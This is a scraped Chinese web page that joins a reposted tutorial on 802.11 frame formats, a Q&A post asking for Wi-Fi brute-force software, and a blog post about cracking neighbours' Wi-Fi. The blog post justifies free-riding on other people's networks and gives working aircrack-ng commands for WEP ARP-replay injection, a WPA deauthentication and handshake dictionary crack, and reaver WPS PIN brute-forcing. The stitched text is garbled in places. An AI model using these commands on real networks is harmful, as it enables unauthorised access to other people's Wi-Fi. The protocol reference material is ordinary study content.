1700人阅读
本文转载至：
1. 802.11标准简介
2. 802.11协议格式
3. Wi-Fi认证过程
4. 802.11标准中的数据安全加密协议
802.11和Wi-Fi技术并不是同一个东西。Wi-Fi标准是802.11标准的一个子集，并且是Wi-Fi联盟负责管理
1. WEP，Wired Equivalent Privacy: 802.11中最早期的加密标准
2. CCMP(CTR with CBC-MAC Protocol): 基于AES的全新加密协议，在IEEE 802.11i中提出
3. WPA(Wi-Fi Protected Access)
4. TKIP(Temporal Key Integrity Protocol)
5. WPA2(Wi-Fi Protected Access 2)
1. 数据: 数据数据包的作用是用来携带更高层次的数据(如IP数据包，ISO7层协议)。
它负责在工作站之间传输数据
2. 管理: 管理数据包控制网络的管理功能
1) 信标帧(Beacons): 在无线设备中，定时依次按指定间隔发送的有规律的无线信号(类似心跳包)，主要用于定位和同步使用
2) 解除认证(Deauthentication)数据包
3) Probe(request and response)
4) Authenticate(request and response)
5) Associate(request and response)
6) Reassociate(request and response)
7) Dissassociate(notify)
管理帧负责监督，主要用来加入或退出无线网络，以及处理接入点之间连接的转移事宜
3. 控制: 控制数据包得名于术语&媒体接入控制(Media Access Control, MAC)&，是用来控制对共享媒体(即物理媒介，如光缆)的访问
1) 请求发送(Request To Send，RTS)数据包
2) 清除发送(Clear To Send，CTS)数据包
3) ACK确认(RTS/CTS)
4) PS-Poll: 当一部移动工作站从省电模式中苏醒，便会发送一个 PS-Poll 帧给基站，以取得任何暂存帧
控制帧通常与数据帧搭配使用，负责区域的清空、信道的取得以及载波监听的维护，并于收到数据时予以正面的应答，借此促进工作站间数据传输的可靠性
1) 独立基本服务集(Independent BSS, IBSS)网络(也叫ad-hoc网络)
2) 基本服务集(Basic Service Set, BSS)网络
3) 扩展服务集(Extent Service Set, ESS)网络
1. 站点服务SS(每个STA都要有的服务)
1) 认证(Authentication)
2) 解除认证(Deauthentication)
3) 加密(Privacy)
4) MSDU传递(MSDU delivery)
2. 分布式系统服务DSS(DS特有服务)
1) 关联(Association)
2) 解除关联(Deassociation)
3) 分布(Distribution)
4) 集成(Integration)
5) 重关联(Ressociation)
1. mac地址数目不定，根据帧类型不同，mac 802.11的mac地址数会不一样。比如说 ACK帧仅有一个mac地址，而数据帧有3个mac地址，在WDS模式下，帧头有4个mac地址。
2. 802.11的管理帧所携带的信息长度不定，在管理帧中，不仅仅只有一些类似于mac地址，分片标志之类的这些信息，而且另外还会包括一些其它的信息，这些信息有关于安全设置的，有关于物理
通信的，比如说我们的SSID名称就是通过管理帧获得的。AP会根据不同的情况发送包含有不同信息的管理帧。
3. 加密(wep,wpa等)信息，QOS(quality of service)信息，若有加密的数据帧格式和没有加密的数据帧格式还不一样，加密数据帧格式还多了个加密头，用于解密用。然则QOS也是同样道理
1. 帧控制结构(Frame Control)
1) Protocol Version: (协议版本)通常为0
2) Type: 帧类型，管理帧: 00
3) Subtype: 进一步判断帧的子类型
3.1) Beacon(信标)帧
3.2) Probe Request(探测请求)帧
3.3) Probe Response(探测响应)帧
3.4) ATIM帧
3.5) Disassociation(解除关联)
3.6) Deauthentication(解除认证)帧
3.7) Association Request(关联请求)帧
3.8) Reassociation Request(重新关联请求)帧
3.9) Authentication(身份认证)帧
4) To DS: 表明该帧是否是BSS向DS发送的帧
5) From DS: 表明该帧是否是DS向BSS发送的帧
6) More Fragment: 用于说明长帧被分段的情况，是否还有其它的帧，如果有则该值设置为1
7) Retry(重传域): 表示该分段是先前传输分段的重发帧。
8) Power Management: 表示传输帧以后，站所采用的电源管理模式
8.1) 为1: STA处于power_save模式
8.2) 为0: STA处于active模式
9) More Data: 表示有很多帧缓存到站中。即至少还有一个数据帧要发送给STA是设置为1。
10) Protected Frame: 表示根据WEP(Wired Equivalent Privacy)算法对帧主体进行加密。如果帧体部分包含被密钥套处理过的数据，则设置为1，否则设置为0
11) Order(序号域): 在长帧分段传送时，该域设置为1表示接受者应该严格按照顺序处理该帧，否则设置为0
2. Duration/ID(持续时间/标识)
表明该帧和它的确认帧将会占用信道多长时间，Duration 值用于网络分配向量(NAV)计算
3. Address Fields(地址域):
1) Destination Address
2) Source Address
4. Sequence Control(序列控制域): 用于过滤重复帧
1) MSDU(MAC Server Data Unit), 12位序列号(Sequence Number)
2) MMSDU(MAC Management Server Data Unit), 4位片段号(Fragment Number)组成
5. Frame Body(Data): 发送或接收的信息。对于不同类型的数据帧来说，这个域的格式差别较大
1) Beacon(信标)帧
1.1) Timestamp(时戳)位: 可用来同步 BSS 中的工作站 BSS 的主计时器会定期发送目前已作用的微秒数。当计数器到达最大值时，便会从头开始计数
1.2) Beacon interval位: AP点每隔一段时间就会发出的Beacon(信标)信号，用来宣布 802.11网络的存在。我们打开无线连接的时候之所以能看到很多Wi-Fi点就是因为它
1.3) Capability information位: 发送Beacon信号的时候，它被用来通知各方，该网络具备哪种性能
1.4) SSID服务集标识(Service Set Identity): 由字节所形成的字串，用来标示所属网络的BSSID，即我们在Wi-Fi连接前看到的接入点名称
1.5) 跳频参数组合(PH Parameter Set): 包含了加入 802.11跳频(frequency-hopping)网络所需要的参数
1.6) 直接序列参数集合(DS Parameter Set): 指明网络所使用的信道数
1.7) 免竞争参数集合(CF Parameter Set): 出现在支持免竞争接入点所发送的 Beacon帧中，并非必须
1.8) IBSS 参数集合(IBSS Parameter Set): 指明ATIM window (数据待传指示通知信息间隔期间)
1.9) TIM数据待传信息(Traffic Indication Map): 指示有哪些工作站需要接收待传数据
1.10) Country: 国家识别码
1.11) 功率限制(Power Constraint): 让网络得以向工作站传达其所允许的最大传输功率
1.12) 信道切换宣告(Channel Switch Announcement): 为了警告网络中的工作站即将变换信道
1.13) 禁声(Quiet): 为了避免与特定的军事雷达技术彼此干扰
1.14) 发射功率控制报告(TPC Report): 指明链路的衰减情况，可以帮助工作站了解该如何调整传输功率
1.15) 扩展物理层(ERP)
1.16) 支持速率(Supported Rates): 无线局域网络支持数种标准速率。当移动工作站试图加入网络，会先检视该网络所使用的数据速率。有些速率是强制性的，每部工作站都必须支持
　　　　 ，有些则是选择性的
1.17) RSN强健安全网络(Robust Security Network)
2) Probe Request(探测请求)帧
2.1) SSID服务集标识(Service Set Identity): 由字节所形成的字串，用来标示所属网络的BSSID，即我们在Wi-Fi连接前看到的接入点名称
2.2) Supported Rate(支持速率)
2.3) 扩展支持速率(Extended Supported Rate)
3) Probe Response(探测响应)帧
3.1) Timestamp(时戳)位: 可用来同步 BSS 中的工作站 BSS 的主计时器会定期发送目前已作用的微秒数。当计数器到达最大值时，便会从头开始计数
3.2) Beacon interval位: AP点每隔一段时间就会发出的Beacon(信标)信号，用来宣布 802.11网络的存在。我们打开无线连接的时候之所以能看到很多Wi-Fi点就是因为它
3.3) Capability information位: 发送Beacon信号的时候，它被用来通知各方，该网络具备哪种性能
3.4) SSID服务集标识(Service Set Identity): 由字节所形成的字串，用来标示所属网络的BSSID，即我们在Wi-Fi连接前看到的接入点名称
3.5) 支持速率(Supported Rates): 无线局域网络支持数种标准速率。当移动工作站试图加入网络，会先检视该网络所使用的数据速率
3.6) 跳频参数组合(PH Parameter Set): 包含了加入 802.11跳频(frequency-hopping)网络所需要的参数
3.7) 直接序列参数集合(DS Parameter Set): 指明网络所使用的信道数
3.8) 免竞争参数集合(CF Parameter Set): 出现在支持免竞争接入点所发送的 Beacon帧中，并非必须
3.9) IBSS 参数集合(IBSS Parameter Set): 指明ATIM window (数据待传指示通知信息间隔期间)
3.10) Country: 国家识别码
3.11) FH Hopping Parameters
3.12) FH Pattern Table
3.13) 功率限制(Power Constraint): 让网络得以向工作站传达其所允许的最大传输功率
3.13) 信道切换宣告(Channel Switch Announcement): 为了警告网络中的工作站即将变换信道
3.14) 禁声(Quiet): 为了避免与特定的军事雷达技术彼此干扰
3.15) IBSS 动态选项(IBSS DFS):在 IBSS 中负责动态选频的工作站可以在管理帧中传递 IBSS DFS 信息元素
3.16) 发射功率控制报告(TPC Report): 指明链路的衰减情况，可以帮助工作站了解该如何调整传输功率
3.17) 扩展物理层(ERP)
3.18) 扩展支持速率(Extended Supported Rate)
3.19) RSN强健安全网络(Robust Security Network)
5) Disassociation(解除关联)
5.1) Beacon Code
6) Deauthentication(解除认证)帧
6.1) Beacon Code
7) Association Request(关联请求)帧
7.1) Capability information位: 发送Beacon信号的时候，它被用来通知各方，该网络具备哪种性能
7.2) Listen interval位: 为了节省电池的电力，工作站可以暂时关闭 802.11网络接口的天线。当工作站处于休眠状态，接入点必须为之暂存帧
7.3) SSID服务集标识(Service Set Identity): 由字节所形成的字串，用来标示所属网络的BSSID，即我们在Wi-Fi连接前看到的接入点名称
7.4) Supported Rate(支持速率)
8) Reassociation Request(重新关联请求)帧
8.1) Capability information位: 发送Beacon信号的时候，它被用来通知各方，该网络具备哪种性能
8.2) Listen interval位: 为了节省电池的电力，工作站可以暂时关闭 802.11网络接口的天线。当工作站处于休眠状态，接入点必须为之暂存帧
8.3) Current AP Address位: 使用Current AP Address(目前接入点的地址)位来表明目前所连接的接入点的 MAC地址
8.4) SSID服务集标识(Service Set Identity): 由字节所形成的字串，用来标示所属网络的BSSID，即我们在Wi-Fi连接前看到的接入点名称
8.5) Supported Rate(支持速率)
9) Authentication(身份认证)帧
9.1) Authentication Algorithm Number: 指明认证程序所使用的认证类型
9.2) Authentication Transaction Sequence Number: 用以追踪身份认证的进度
9.3) Status Code: 状态代码用来表示某项过程成功或失败
9.4) 质询口令(Challenge Text): 802.11所定义的共享密钥身份认证系统。会要求移动工作站必须成功解码一段加密过的质询口令。这段质询口令的发送系通过 Challenge Text
　　　　(质询口令)信息元素
6. FCS(CRC): 包括32位的循环冗余校验(CRC)，用于检错，注意是检错不是纠错
1. 帧控制结构(Frame Control)
1) Protocol Version: (协议版本)通常为0
2) Type: 帧类型，数据帧: 10
3) Subtype: 进一步判断帧的子类型，不同类型的数据帧这个字段的格式是不同的
3.1) IBSS帧
3.1.1) 0000: Data
3.1.2) 0010: Null
3.2) From AP帧
3.2.1) 0000: Data
3.2.2) 1000: Data+CF+ASK
3.2.3) 0100: Data+CF+Poll
3.2.4) 1100: Data+CF+ACK+CF+Poll
3.2.5) 1010: CF+ACK
3.2.6) 0110: CF+Poll
3.2.7) 1110: ACK+CF+Poll
3.3) To AP帧
3.3.1) 0000: Data
3.3.2) 1000: Data+CF+ACK
3.3.3) 0010: Null
3.3.4) 1010: CF+ACK(no data)
3.4) WDS帧
4) To DS: 表明该帧是否是BSS向DS发送的帧时
4.1) IBSS: 设置为0
4.2) To AP: 设置为1
4.3) From AP: 设置为0
4.4) WDS: 设置为1
5) From DS: 表明该帧是否是DS向BSS发送的帧时
5.1) IBSS: 设置为0
5.2) To AP: 设置为0
5.3) From AP: 设置为1
5.4) WDS: 设置为1
6) More Fragment: 用于说明长帧被分段的情况，是否还有其它的帧，如果有则该值设置为1
7) Retry(重传域): 表示该分段是先前传输分段的重发帧。
8) Power Management: 表示传输帧以后，站所采用的电源管理模式
8.1) 为1: STA处于power_save模式
8.2) 为0: STA处于active模式
9) More Data: 表示有很多帧缓存到站中。即至少还有一个数据帧要发送给STA是设置为1。
10) Protected Frame: 表示根据WEP(Wired Equivalent Privacy)算法对帧主体进行加密。如果帧体部分包含被密钥套处理过的数据，则设置为1，否则设置为0
11) Order(序号域): 在长帧分段传送时，该域设置为1表示接受者应该严格按照顺序处理该帧，否则设置为0
2. Duration/ID(持续时间/标识)
表明该帧和它的确认帧将会占用信道多长时间，Duration 值用于网络分配向量(NAV)计算
3. Address Fields(地址域):
这个域的具体格式和控制帧的子类型有关，不同的子类型会有一些微小的差别
1.1) Destination Address
1.2) Source Address
1.3) BSSID
每个BSS都会被赋予一个BSSID，它是一个长度为48个bit的二进制识别码，用来辨识不同的BSS
2) From AP
2.1) Destination Address
2.2) BSSID
2.3) Source Address
3.1) BSSID
3.2) Source Address
3.3) Destination Address
4.1) BSSID
4.2) Source Address
4.3) Destination Address
4. Sequence Control(序列控制域): 用于过滤重复帧
1) MSDU(MAC Server Data Unit), 12位序列号(Sequence Number)
2) MMSDU(MAC Management Server Data Unit), 4位片段号(Fragment Number)组成
[SA，只有WDS中的帧有这个字段]
5. Frame Body(Data): 发送或接收的信息。
6. FCS(CRC): 包括32位的循环冗余校验(CRC)，用于检错，注意是检错不是纠错
1. 帧控制结构(Frame Control)
1) Protocol Version: (协议版本)通常为0
2) Type: 帧类型，控制帧: 01
3) Subtype: 进一步判断帧的子类型:
3.1) 请求发送(Request To Send，RTS)数据包
3.2) 清除发送(Clear To Send，CTS)数据包
3.3) ACK确认(RTS/CTS)
3.4) PS-Poll: 当一部移动工作站从省电模式中苏醒，便会发送一个 PS-Poll 帧给基站，以取得任何暂存帧
4) To DS: 表明该帧是BSS向DS发送的帧时，该值设置为1
5) From DS: 表明该帧是DS向BSS发送的帧时，该值设置为1
控制帧负责处理无线介质的访问，因此只能够由无线工作站产生。传输系统并不会收送控制帧，因此这两个Bit必然为0
6) More Fragment: 用于说明长帧被分段的情况，是否还有其它的帧，如果有则该值设置为1。
控制帧不可能被切割，这个Bit必然为0
7) Retry(重传域): 表示该分段是先前传输分段的重发帧。
控制帧不像管理或数据帧那样，必须在序列中等候重送，因此这个 Bit必然为0
8) Power Management: 表示传输帧以后，站所采用的电源管理模式
8.1) 为1: STA处于power_save模式
8.2) 为0: STA处于active模式
9) More Data: 表示有很多帧缓存到站中。即至少还有一个数据帧要发送给STA是设置为1。
More Data bit只用于管理数据帧，在控制帧中此Bit必然为0
10) Protected Frame: 表示根据WEP(Wired Equivalent Privacy)算法对帧主体进行加密。如果帧体部分包含被密钥套处理过的数据，则设置为1，否则设置为0。
控制帧不会经过加密。因此对控制帧而言，Protected Frame bit必然为0。
11) Order(序号域): 在长帧分段传送时，该域设置为1表示接受者应该严格按照顺序处理该帧，否则设置为0。
控制帧是基本帧交换程序(atomic frame exchange operation)的组成要件，因此必须依序发送。所以这个Bit必然为0
2. Duration/ID(持续时间/标识)
表明该帧和它的确认帧将会占用信道多长时间，Duration 值用于网络分配向量(NAV)计算。
注意: 在PS-Poll帧中不包含Duration/ID这个字段
3. Address Fields(地址域):
这个域的具体格式和控制帧的子类型有关，不同的子类型会有一些微小的差别
3.1) RTS(请求发送帧)
3.1.1) Receiver Address(接收端地址)
接收大型帧的工作站的地址
3.1.2) Transmitter Address(发送端地址)
RTS帧的发送端的地址
3.2) CTS(允许发送)
3.2.1) Receiver Address(接收端地址)
3.3) ACK(应答)
3.3.1) Receiver Address(接收端地址)
3.4) PS-Poll(省电模式一轮询)
3.4.1) AID(连接识别码 association ID)
连接识别码是接入点所指定的一个数值，用以区别各个连接。将此识别码置入帧，可让接入点找出为其(移动工作站)所暂存的帧
3.4.2) BSSID
此位包含发送端目前所在 BSS(AP)的BSSID ，此BSS 建立自目前所连接的AP
3.4.3) Transmitter Address(发送端地址)
此为PS-Poll帧之发送端的 MAC地址
4. FCS(CRC): 包括32位的循环冗余校验(CRC)，用于检错，注意是检错不是纠错
ifconfig -a
ifconfig wlan1 up
airmon-ng start wlan1
启动wireshark，选择mon0网卡(开启了Monotor模式的虚拟网卡
1. Deanthentication攻击
2. Disassociation攻击
1. WEP，Wired Equivalent Privacy: 802.11中最早期的加密标准
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
2. CCMP(CTR with CBC-MAC Protocol): 基于AES的全新加密协议，在IEEE 802.11i中提出
http://en.wikipedia.org/wiki/CCMP
3. WPA(Wi-Fi Protected Access)
http://en.wikipedia.org/wiki/WPA
4. TKIP(Temporal Key Integrity Protocol)
http://en.wikipedia.org/wiki/Temporal_Key_Integrity_Protocol
5. WPA2(Wi-Fi Protected Access 2)
http://en.wikipedia.org/wiki/WPA2
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场Wi-Fi暴力破解软件（附加字典），电脑用的，不要手机版的_百度知道
Wi-Fi暴力破解软件（附加字典），电脑用的，不要手机版的
我前几天在淘宝买一个大功率无线网卡，送的有破解光盘很好用！
其他类似问题
为您推荐：
暴力破解的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁wi-fi无线破解过程与原理简要介绍
最近破解了几个无线，基本上算是好奇心的驱使，因为我的网的网速还是不错的，蹭到的网快不到哪儿去，尤其是在人家p2p时。
虽说蹭网不是什么光彩的事，但如果一些网络资源没有使用而闲置着，利用起来也不是什么坏事。在中国目前这样的大环境下，只要遵守一定的道德底线，蹭网也算是社会资源的充分利用吧。
一些wi-fi破解论坛里教程什么的都很详尽，卖的所谓的&蹭网卡&的说明书也是step by step的，图文并茂，通俗易懂。其实他们都是在说，安装一个虚拟机，挂载含有破解程序的光盘镜像，启动起来虚拟机并运行其中的破解程序。个中过程，下面细细说来。
wi-fi信号是一种无线电，频率是2.4GHz，这相当于调频收音机最高频点(108MHz)的22倍，受其高频率的局限，其覆盖范围远没有调频广播的覆盖范围大，正常功率、日常环境下也就在100米之内。在半径100米的城市环境里，随着各种wi-fi设备的增加，总能搜索到一两个信号，下图是我在某地的搜索结果：
除CMCC等运营商的wi-fi外，其它都是加密的。加密方式分两种，一种是WEP，一种是WPA/WPA2。WEP加密是一种比较原始的加密方式，由于其自身的设计上的漏洞，只要信号强度足够，在1小时之内就能被完全破解，而破解的方式也有好几种，并能在无客户端连接的情况下注入破解。现在出售的无线路由器仍保留WEP加密方式的选项，很可能只是惯例，建议大家不要再使用这种加密方式。WPA加密是目前主流的加密方式，在无客户端并且关闭WPS等连接方式时，只要密码强度足够，被破解的概率还是很低的。
目前的wi-fi破解核心工具有两个，与，前者是wi-fi破解工具的一个集合，上面说到的WEP与WPA加密方式的破解由它来实现，后者是WPS破解方式的（pin破）实现。下面用实例说明：
WEP破解过程：
airodump-ng mon0
airmon-ng用来虚拟一个无线网卡，这样可以将一张无线网卡同时做不同的用途。
airodump-ng &ivs &channel 9 &bssid 1C:7E:E5:xx:xx:xx -w aprcapture mon0
airodump 抓取指定的bssid AP的数据包，并保存在一个文件里。
aireplay-ng -3 -b 1C:7E:E5:xx:xx:xx -h 0C:60:76:xx:xx:xx mon0
这行命令是在airodump执行的同时执行，它以模式&3&（ARP请求代理）从源MAC地址向目的MAC地址发送ARP请求。目的就是获得AP返回的ARP响应。
aircrack-ng aprcapture-01.ivs
aircrack-ng分析捕获的ivs数据包，分析出密码。
WPA破解过程：
airodump-ng -c 9 &bssid xx:xx:xx:xx:xx:xx -w psk mon0
同样，需要airodump-ng抓包
aireplay-ng -0 1 -a F4:EC:xx:xx:xx:xx -c 5C:AC:xx:xx:xx:xx mon0
用aireplay的&0&模式（攻击模式，模拟目标客户端向AP发送重连请求，从而会使目标客户端断开连接），借以捕获握手包。
aircrack-ng -w pswd.dict -b xx:xx:xx:xx:xx:xx psk*.cap
用aircrack-ng加载一个字典，用这个字典跑出明文密码，若密码不在字典中，破解将各失败。
WPS破解（pin破）过程：
reaver -i mon0 -b 40:16:xx:xx:xx:xx -a -S -s 4016xxxxxxxx.wpc -v
pin破原理也很简单，就是枚举所有pin值。但由于受制于无线的硬件（内存、CPU），pin破的过程很可能非常缓慢。但由于pin值的确定性，这种方式获得密码的概率要高于WPA方式。
3种方式对比：
1. 若是WEP，毫无悬念，没什么破解的阻力。
破解难易程度：★
2. 若有S连接方式，只要功夫深，铁杵磨成针，最终还是能得到密码的。
破解难易程度：★★
3. 若是WPA加密，那就看运气了，抓包，跑字典，1234什么的密码就是撞大运了。
破解难易程度：★★★
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。